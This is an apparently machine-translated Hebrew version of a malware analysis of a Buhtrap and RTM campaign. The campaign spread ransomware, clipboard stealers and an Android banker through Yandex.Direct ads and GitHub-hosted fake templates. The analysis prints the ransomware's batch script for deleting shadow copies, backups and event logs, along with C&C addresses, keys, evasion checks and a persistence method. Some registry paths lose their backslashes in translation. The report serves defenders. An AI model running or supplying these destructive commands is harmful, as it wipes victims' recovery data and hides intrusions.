הדלת האחורית ומצפין Buhtrap הופצו באמצעות Yandex.Direct

כדי למקד רואי חשבון במתקפת סייבר, אתה יכול להשתמש במסמכי עבודה שהם מחפשים באינטרנט. זה בערך מה שקבוצת סייבר עשתה במהלך החודשים האחרונים, והפצה דלתות אחוריות ידועות. בושטראפ и RTM, כמו גם מוצפנים ותוכנות לגניבת מטבעות קריפטוגרפיים. רוב המטרות ממוקמות ברוסיה. המתקפה בוצעה על ידי פרסום פרסום זדוני ב-Yandex.Direct. קורבנות פוטנציאליים הופנו לאתר אינטרנט שבו התבקשו להוריד קובץ זדוני שהוסווה לתבנית מסמך. Yandex הסירה את הפרסום הזדוני לאחר האזהרה שלנו.

קוד המקור של Buhtrap הודלף באינטרנט בעבר כך שכל אחד יכול להשתמש בו. אין לנו מידע לגבי זמינות קוד RTM.

בפוסט זה נספר לכם כיצד הפיצו התוקפים תוכנות זדוניות באמצעות Yandex.Direct ואירחו אותה ב-GitHub. הפוסט יסתיים בניתוח טכני של התוכנה הזדונית.

Buhtrap ו-RTM חוזרים לעניינים

מנגנון התפשטות וקורבנות

המטענים השונים המועברים לקורבנות חולקים מנגנון הפצה משותף. כל הקבצים הזדוניים שנוצרו על ידי התוקפים הונחו בשני מאגרי GitHub שונים.

בדרך כלל, המאגר הכיל קובץ זדוני אחד להורדה, שהשתנה לעתים קרובות. מכיוון ש-GitHub מאפשר לך להציג את היסטוריית השינויים במאגר, אנו יכולים לראות אילו תוכנות זדוניות הופצו במהלך תקופה מסוימת. כדי לשכנע את הקורבן להוריד את הקובץ הזדוני, נעשה שימוש באתר blanki-shabloni24[.]ru, המוצג באיור למעלה.

עיצוב האתר וכל שמות הקבצים הזדוניים מתנהלים בקונספט אחד - טפסים, תבניות, חוזים, דוגמאות וכו'. בהתחשב בכך שכבר בעבר נעשה שימוש בתוכנות Buhtrap ו-RTM בהתקפות על רואי חשבון, הנחנו ש- האסטרטגיה בקמפיין החדש זהה. השאלה היחידה היא איך הקורבן הגיע לאתר התוקפים.

זיהום

לפחות כמה קורבנות פוטנציאליים שהגיעו לאתר זה נמשכו על ידי פרסום זדוני. להלן כתובת אתר לדוגמה:

https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456

כפי שניתן לראות מהקישור, הבאנר פורסם בפורום חשבונאות לגיטימי bb.f2[.]kz. חשוב לציין שהבאנרים הופיעו באתרים שונים, לכולם היה אותו מזהה קמפיין (blanki_rsya), ורובם קשורים לשירותי חשבונאות או סיוע משפטי. כתובת האתר מראה שהקורבן הפוטנציאלי השתמש בבקשה "טופס הורדת חשבונית", התומכת בהשערה שלנו לגבי התקפות ממוקדות. להלן האתרים שבהם הופיעו הבאנרים ושאילתות החיפוש המתאימות.

• הורדת טופס חשבונית – bb.f2[.]kz
• חוזה לדוגמה - Ipopen[.]ru
• דוגמה לתלונה של בקשה - 77metrov[.]ru
• טופס הסכם - blank-dogovor-kupli-prodazhi[.]ru
• עתירה לדוגמה - zen.yandex[.]ru
• תלונה לדוגמה - yurday[.]ru
• טפסי חוזה לדוגמה – Regforum[.]ru
• טופס חוזה – assistentus[.]ru
• הסכם דירה לדוגמה – napravah[.]com
• דוגמאות של חוזים משפטיים - avito[.]ru

ייתכן שהאתר blanki-shabloni24[.]ru הוגדר לעבור הערכה ויזואלית פשוטה. בדרך כלל, מודעה שמפנה לאתר בעל מראה מקצועי עם קישור ל-GitHub לא נראית כמו משהו רע בעליל. בנוסף, התוקפים העלו קבצים זדוניים למאגר רק לתקופה מוגבלת, ככל הנראה במהלך הקמפיין. רוב הזמן, מאגר GitHub הכיל ארכיון zip ריק או קובץ EXE ריק. לפיכך, התוקפים יכלו להפיץ פרסום באמצעות Yandex.Direct באתרים שסביר להניח שביקרו בהם רואי חשבון שהגיעו בתגובה לשאילתות חיפוש ספציפיות.

לאחר מכן, בואו נסתכל על המטענים השונים המופצים בדרך זו.

ניתוח מטען

כרונולוגיה של תפוצה

הקמפיין הזדוני החל בסוף אוקטובר 2018 והוא פעיל בזמן כתיבת שורות אלה. מכיוון שהמאגר כולו היה זמין לציבור ב-GitHub, ערכנו ציר זמן מדויק של ההפצה של שש משפחות תוכנות זדוניות שונות (ראה איור למטה). הוספנו שורה המציגה מתי התגלה קישור הבאנר, כפי שנמדד על ידי טלמטריה של ESET, לצורך השוואה עם היסטוריית git. כפי שאתה יכול לראות, זה מתאם היטב לזמינות המטען ב- GitHub. ניתן להסביר את הפער בסוף פברואר בכך שלא היה לנו חלק מהיסטוריית השינויים כי המאגר הוסר מ-GitHub לפני שהצלחנו לקבל אותו במלואו.

איור 1. כרונולוגיה של התפשטות תוכנות זדוניות.

תעודות חתימת קוד

הקמפיין השתמש במספר תעודות. חלקם הוחתמו על ידי יותר ממשפחת תוכנות זדוניות אחת, מה שמצביע עוד יותר על כך שדגימות שונות השתייכו לאותו מסע פרסום. למרות הזמינות של המפתח הפרטי, המפעילים לא חתמו באופן שיטתי על הקבצים הבינאריים ולא השתמשו במפתח עבור כל הדגימות. בסוף פברואר 2019, התוקפים החלו ליצור חתימות לא חוקיות באמצעות אישור בבעלות גוגל, שעבורו לא היה להם המפתח הפרטי.

כל האישורים המעורבים במסע הפרסום ומשפחות התוכנות הזדוניות שעליהן חותמים מופיעות בטבלה למטה.

השתמשנו גם באישורי חתימת קוד אלה כדי ליצור קישורים עם משפחות תוכנות זדוניות אחרות. עבור רוב האישורים, לא מצאנו דוגמאות שלא הופצו דרך מאגר GitHub. עם זאת, אישור TOV "MARIYA" שימש לחתימה על תוכנות זדוניות השייכות ל-botnet וואוצ'וס, תוכנות פרסום וכורים. לא סביר שתוכנה זדונית זו קשורה למסע פרסום זה. ככל הנראה, התעודה נרכשה ברשת האפלה.

Win32/Filecoder.Buhtrap

הרכיב הראשון שמשך את תשומת ליבנו היה ה-Win32/Filecoder.Buhtrap שהתגלה לאחרונה. זהו קובץ בינארי של Delphi שלפעמים ארוז. הוא הופץ בעיקר בפברואר-מרץ 2019. הוא מתנהג כיאה לתוכנת כופר - הוא מחפש כוננים מקומיים ותיקיות רשת ומצפין את הקבצים שהוא מוצא. זה לא צריך חיבור לאינטרנט כדי להיפגע מכיוון שהוא לא יוצר קשר עם השרת כדי לשלוח מפתחות הצפנה. במקום זאת, הוא מוסיף "אסימון" לסוף הודעת הכופר, ומציע להשתמש בדוא"ל או ב-Bitmessage כדי ליצור קשר עם מפעילים.

כדי להצפין כמה שיותר משאבים רגישים, Filecoder.Buhtrap מפעיל שרשור שנועד לכבות תוכנות מפתח שעשויות להכיל מטפלי קבצים פתוחים המכילים מידע בעל ערך שעלול להפריע להצפנה. תהליכי היעד הם בעיקר מערכות ניהול מסדי נתונים (DBMS). בנוסף, Filecoder.Buhtrap מוחק קובצי יומן וגיבויים כדי להקשות על שחזור הנתונים. כדי לעשות זאת, הפעל את סקריפט האצווה למטה.

bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled

Filecoder.Buhtrap משתמש בשירות IP Logger מקוון לגיטימי שנועד לאסוף מידע על מבקרים באתר. זה נועד לעקוב אחר קורבנות של תוכנת הכופר, שהיא באחריות שורת הפקודה:

mshta.exe "javascript:document.write('');"

קבצים להצפנה נבחרים אם הם אינם תואמים לשלוש רשימות אי הכללה. ראשית, קבצים עם הסיומות הבאות אינם מוצפנים: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys ו- .עטלף. שנית, כל הקבצים שעבורם הנתיב המלא מכיל מחרוזות ספריות מהרשימה למטה אינם נכללים.

.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel

שלישית, גם שמות קבצים מסוימים אינם נכללים בהצפנה, ביניהם שם הקובץ של הודעת הכופר. הרשימה מוצגת להלן. ברור שכל החריגים הללו נועדו לשמור על המכונה פועלת, אך עם כושר נסיעה מינימלי.

boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe

ערכת הצפנת קבצים

לאחר הביצוע, התוכנה הזדונית מייצרת זוג מפתחות RSA של 512 סיביות. המעריך הפרטי (d) והמודול (n) מוצפנים לאחר מכן עם מפתח ציבורי מקודד של 2048 סיביות (מעריך ציבורי ומודולוס), עמוס ב-zlib ומקודד base64. הקוד שאחראי לכך מוצג באיור 2.

איור 2. תוצאה של פירוק Hex-Rys של תהליך יצירת זוג מפתחות RSA של 512 סיביות.

להלן דוגמה לטקסט רגיל עם מפתח פרטי שנוצר, שהוא אסימון המצורף להודעת הכופר.

DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239

המפתח הציבורי של התוקפים ניתן להלן.

e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD

הקבצים מוצפנים באמצעות AES-128-CBC עם מפתח 256 סיביות. עבור כל קובץ מוצפן נוצר מפתח חדש ווקטור אתחול חדש. פרטי המפתח מתווספים לסוף הקובץ המוצפן. הבה נשקול את הפורמט של הקובץ המוצפן.
לקבצים מוצפנים יש את הכותרת הבאה:

נתוני קובץ המקור בתוספת ערך הקסם VEGA מוצפנים ל-0x5000 בתים הראשונים. כל מידע הפענוח מצורף לקובץ בעל המבנה הבא:

- סמן גודל הקובץ מכיל סימון המציין אם הקובץ גדול מ-0x5000 בתים
— AES key blob = ZlibCompress(RSAencrypt(AES key + IV, מפתח ציבורי של זוג מפתחות RSA שנוצר))
- RSA key blob = ZlibCompress(RSAencrypt(מפתח RSA פרטי שנוצר, מפתח RSA ציבורי מקודד קשה))

Win32/ClipBanker

Win32/ClipBanker הוא רכיב שהופץ לסירוגין מסוף אוקטובר עד תחילת דצמבר 2018. תפקידו לפקח על תוכן הלוח, הוא מחפש כתובות של ארנקי cryptocurrency. לאחר שקבע את כתובת היעד של ארנק, ClipBanker מחליף אותה בכתובת שלדעתה שייכת למפעילים. הדגימות שבדקנו לא היו ארוזות ולא מעורפלות. המנגנון היחיד המשמש להסוות התנהגות הוא הצפנת מחרוזת. כתובות ארנק המפעיל מוצפנות באמצעות RC4. מטבעות קריפטוגרפיים היעד הם ביטקוין, ביטקוין מזומן, Dogecoin, Ethereum ו-Ripple.

במהלך התקופה שהתוכנה הזדונית התפשטה לארנקי הביטקוין של התוקפים, נשלחה כמות קטנה ל-VTS, מה שמטיל ספק בהצלחת הקמפיין. בנוסף, אין ראיות המצביעות על כך שעסקאות אלו היו קשורות ל-ClipBanker בכלל.

Win32/RTM

רכיב Win32/RTM הופץ במשך מספר ימים בתחילת מרץ 2019. RTM הוא בנקאי טרויאני שנכתב בדלפי, המכוון למערכות בנקאות מרוחקות. בשנת 2017 פרסמו חוקרי ESET ניתוח מפורט של תוכנית זו, התיאור עדיין רלוונטי. בינואר 2019, Palo Alto Networks יצאה גם היא פוסט בבלוג על RTM.

מעמיס Buhtrap

במשך זמן מה, הורדה היה זמין ב-GitHub שלא היה דומה לכלי Buhtrap הקודמים. הוא פונה אל https://94.100.18[.]67/RSS.php?<some_id> כדי לקבל את השלב הבא ולטעון אותו ישירות לזיכרון. אנו יכולים להבחין בין שתי התנהגויות של קוד השלב השני. בכתובת ה-URL הראשונה, RSS.php עבר ישירות את הדלת האחורית של Buhtrap - הדלת האחורית הזו דומה מאוד לזו הזמינה לאחר דלף קוד המקור.

באופן מעניין, אנו רואים מספר קמפיינים עם הדלת האחורית של Buhtrap, והם מנוהלים לכאורה על ידי מפעילים שונים. במקרה זה, ההבדל העיקרי הוא שהדלת האחורית נטענת ישירות לזיכרון ואינה משתמשת בסכימה הרגילה עם תהליך פריסת ה-DLL שעליו דיברנו לפני. בנוסף, המפעילים שינו את מפתח RC4 המשמש להצפנת תעבורת רשת לשרת C&C. ברוב הקמפיינים שראינו, המפעילים לא טרחו לשנות את המפתח הזה.

ההתנהגות השנייה והמורכבת יותר הייתה שכתובת ה-URL של RSS.php הועברה לטוען אחר. הוא הטמיע מעט ערפול, כגון בנייה מחדש של טבלת הייבוא ​​הדינמי. מטרת טוען האתחול היא ליצור קשר עם שרת C&C msiofficeupd[.]com/api/F27F84EDA4D13B15/2, שלח את היומנים והמתן לתגובה. הוא מעבד את התגובה כגוש, טוען אותה לזיכרון ומבצע אותה. המטען שראינו מבצע את המעמיס הזה היה אותה דלת אחורית של Buhtrap, אבל ייתכן שיש רכיבים אחרים.

אנדרואיד/Spy.Banker

מעניין לציין שגם רכיב עבור אנדרואיד נמצא במאגר GitHub. הוא היה בסניף הראשי רק יום אחד - 1 בנובמבר 2018. מלבד פרסום ב-GitHub, ESET telemetry לא מוצא עדות להפצת תוכנה זדונית זו.

הרכיב התארח כחבילת יישומי אנדרואיד (APK). זה מעורפל מאוד. ההתנהגות הזדונית מוסתרת ב-JAR מוצפן שנמצא ב-APK. הוא מוצפן עם RC4 באמצעות מפתח זה:

key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]

אותם מפתח ואלגוריתם משמשים להצפנת מחרוזות. JAR ממוקם ב APK_ROOT + image/files. 4 הבתים הראשונים של הקובץ מכילים את אורך ה-JAR המוצפן, שמתחיל מיד אחרי שדה האורך.

לאחר פענוח הקובץ, גילינו שזה היה אנוביס - בעבר מְתוֹעָד בנקאי לאנדרואיד. לתוכנה הזדונית יש את התכונות הבאות:

• הקלטת מיקרופון
• צילום מסך
• קבלת קואורדינטות GPS
• keylogger
• הצפנת נתוני המכשיר ודרישת כופר
• שליחת דואר זבל

מעניין שהבנקאי השתמש בטוויטר כערוץ תקשורת גיבוי כדי להשיג שרת C&C אחר. המדגם שניתחנו השתמש בחשבון @JonesTrader, אך בזמן הניתוח הוא כבר היה חסום.

הבנקאי מכיל רשימה של יישומי יעד במכשיר האנדרואיד. היא ארוכה מהרשימה שהתקבלה במחקר של סופוס. הרשימה כוללת אפליקציות בנקאיות רבות, תוכניות קניות מקוונות כמו אמזון ו-eBay ושירותי מטבעות קריפטוגרפיים.

MSIL/ClipBanker.IH

הרכיב האחרון שהופץ כחלק ממסע פרסום זה היה קובץ ההפעלה של .NET Windows, שהופיע במרץ 2019. רוב הגרסאות שנחקרו נארזו עם ConfuserEx v1.0.0. כמו ClipBanker, רכיב זה משתמש בלוח. המטרה שלו היא מגוון רחב של מטבעות קריפטוגרפיים, כמו גם הצעות ב-Steam. בנוסף, הוא משתמש בשירות IP Logger כדי לגנוב את מפתח ה-WIF הפרטי של ביטקוין.

מנגנוני הגנה
בנוסף ליתרונות ש-ConfuserEx מספקת במניעת איתור באגים, השלכה והתעסקות, הרכיב כולל את היכולת לזהות מוצרי אנטי-וירוס ומכונות וירטואליות.

כדי לוודא שהוא פועל במכונה וירטואלית, התוכנה הזדונית משתמשת בשורת הפקודה המובנית של Windows WMI (WMIC) כדי לבקש מידע BIOS, כלומר:

wmic bios

לאחר מכן התוכנית מנתחת את פלט הפקודה ומחפשת מילות מפתח: VBOX, VirtualBox, XEN, qemu, bochs, VM.

כדי לזהות מוצרי אנטי-וירוס, תוכנה זדונית שולחת בקשה ל-Windows Management Instrumentation (WMI) למרכז האבטחה של Windows באמצעות ManagementObjectSearcher API כפי שמוצג להלן. לאחר פענוח מ-base64 השיחה נראית כך:

ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')

איור 3. תהליך זיהוי מוצרי אנטי וירוס.

בנוסף, התוכנה הזדונית בודקת אם CryptoClipWatcher, כלי להגנה מפני התקפות לוח, ואם הוא פועל, משעה את כל השרשורים בתהליך זה, ובכך משבית את ההגנה.

הַתמָדָה

גרסת התוכנה הזדונית שחקרנו מעתיקה את עצמה לתוכה %APPDATA%googleupdater.exe ומגדיר את התכונה "נסתר" עבור ספריית גוגל. ואז היא משנה את הערך SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell ברישום של Windows ומוסיף את הנתיב updater.exe. בדרך זו, התוכנה הזדונית תופעל בכל פעם שהמשתמש מתחבר.

התנהגות זדונית

בדומה ל-ClipBanker, התוכנה הזדונית עוקבת אחר תוכן הלוח ומחפשת כתובות של ארנק קריפטו, וכאשר היא נמצאת, מחליפה אותה באחת מכתובות המפעיל. להלן רשימה של כתובות יעד המבוססות על מה שנמצא בקוד.

BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL

לכל סוג כתובת יש ביטוי רגולרי מתאים. הערך STEAM_URL משמש כדי לתקוף את מערכת Steam, כפי שניתן לראות מהביטוי הרגולרי המשמש להגדרה במאגר:

b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b

ערוץ סינון

בנוסף להחלפת כתובות במאגר, התוכנה הזדונית מכוונת למפתחות ה-WIF הפרטיים של ארנקי Bitcoin, Bitcoin Core ו-Electrum Bitcoin. התוכנית משתמשת ב-plogger.org כערוץ סינון כדי להשיג את המפתח הפרטי של WIF. לשם כך, אופרטורים מוסיפים נתוני מפתח פרטי לכותרת User-Agent HTTP, כפי שמוצג להלן.

איור 4. קונסולת IP לוגר עם נתוני פלט.

המפעילים לא השתמשו ב-iplogger.org כדי לסנן ארנקים. הם כנראה נקטו בשיטה אחרת בגלל מגבלת 255 התווים בשטח User-Agentמוצג בממשק האינטרנט של IP Logger. בדוגמאות שלמדנו, שרת הפלט השני נשמר במשתנה הסביבה DiscordWebHook. באופן מפתיע, משתנה סביבה זה אינו מוקצה בשום מקום בקוד. זה מצביע על כך שהתוכנה הזדונית עדיין בפיתוח והמשתנה מוקצה למכונת הבדיקה של המפעיל.

יש עוד סימן לכך שהתוכנית בפיתוח. הקובץ הבינארי כולל שתי כתובות URL של iplogger.org, ושניהם נשאלים כאשר נתונים עוברים סינון. בבקשה לאחת מכתובות האתרים הללו, לפני הערך בשדה Referer יש "DEV /". מצאנו גם גרסה שלא ארוזה באמצעות ConfuserEx, הנמען של כתובת האתר הזו נקרא DevFeedbackUrl. בהתבסס על שם משתנה הסביבה, אנו מאמינים שהמפעילים מתכננים להשתמש בשירות הלגיטימי Discord ובמערכת יירוט האינטרנט שלו כדי לגנוב ארנקים של מטבעות קריפטוגרפיים.

מסקנה

קמפיין זה הוא דוגמה לשימוש בשירותי פרסום לגיטימיים בהתקפות סייבר. התוכנית מכוונת לארגונים רוסיים, אך לא נתפלא לראות מתקפה כזו באמצעות שירותים שאינם רוסים. כדי למנוע פשרה, המשתמשים חייבים להיות בטוחים במוניטין של מקור התוכנה שהם מורידים.

רשימה מלאה של אינדיקטורים של פשרה ותכונות MITER ATT&CK זמינה בכתובת קשר.

מקור: www.habr.com